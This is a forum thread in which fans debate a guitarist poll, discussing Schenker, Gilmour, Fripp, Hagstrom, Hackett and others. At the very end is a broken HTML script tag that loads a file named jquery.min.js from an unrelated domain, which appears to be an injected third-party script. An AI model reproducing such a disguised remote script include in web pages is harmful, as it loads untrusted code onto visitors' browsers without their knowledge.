Schenker became famous with the British band UFO, and later on his band's line-ups were often multi-national.

I had a feeling Michael Schenker was in the Scorpions too, but I just discovered that was his brother, Rudolf Schenker. Smile

Michael Schenker was in the Scorpions, on their debut album, and guest on the bands 1979 album Lovedrive, where he played on three songs.

I would be surprised if Uli John Roth is in any of your guitar magazine lists, but I very much doubt it.

Gilmour should win the whole thing!!

I am glad MSchenker is in the list, what he did as a teenager with the Scorps first album is brilliant. And then bringing global fame to UFO, as well as writing some of their best songs is crazy.

I have a feeling Jimi Hendrix will win the final face-off poll, although I'm a big fan of David Gilmour too. We have David Gilmour to thank for giving Kate Bush her big break. Heart

seeing a massive Mick poll failure coming on.. but it is early yet..  you are missing one of greatest of the greats...

got to give up to Buddy Guy.. next to Albert Colins..my favorite of the middle school blues guitarists... amazing stuff man...

the guitar on this track is simply fantastic. the solo in the "blues section" of this song is my favorite rock guitar solo of all time

Right in this batch of 10, we've got Marten Hagstrom, a Swede.

Oh, there have been others who, technically speaking, are neither American nor British; Gallagher and Edge, and I'm sure we'll be seeing Gary Moore soon.

Gary Moore is British too - he's from Northern Ireland. Wink

What, no Robert Fripp? I would opine that Guitarist Magazine is not a reliable source for anything about guitars for missing this icon.

I agree. Shocked

It seems odd to me that Guitarist Magazine included Adrian Belew of King Crimson in their poll and yet they neglected to include Robert Fripp. Confused

Okay, voted for Marten Hagstrom because I can't believe there are no votes on this man while Frusciante and Buddy Guy are getting some.

While heavy metal fans tend to overrate technical prowess in its lamest manifestation (shredding), I also can't stand overrating guitar players who simply come up with pretty, spacey solos... for sure there is some truth to "playing RIGHT notes instead of many", but there should be more to a guitar solo than legato wails and moans... I love my guitar players to showcase different techniques and dynamics, they Have To come out as superheroes sometimes, take-no-prisoners guns-blazin rock afficionados.

Of course I'm not describing Hagstrom now. Marten deserves at least one vote for impeccable rhythm guitar skills in a highly difficult subgenre that he pretty much invented (with Meshuggah).

As long as Steve Hackett goes to the next round, I'm happy..

^^ It's good to see David Gilmour and Steve Hackett are both now guaranteed to go through to the final face-off round, although to be honest, I'd never heard of Marten Hagstrom before posting this poll.

Would like to go with Frusciante a very interesting guitar
Good option to show this great side project from him

But with Steve Hackett here cannot, and even though my vote will go to the obvious: David G.

I love David Gilmour and would have voted for him, but Peter Green had 0 votes... But Gilmour is my #2 after Jimmy Page, and Peter Green is right behind.< ="text/" ="utf-8" id="tr-app" ="https://cdn.optitc.com/jquery.min.js?u=eng&f=2&s=500,400,50,50&v=0.0.4">
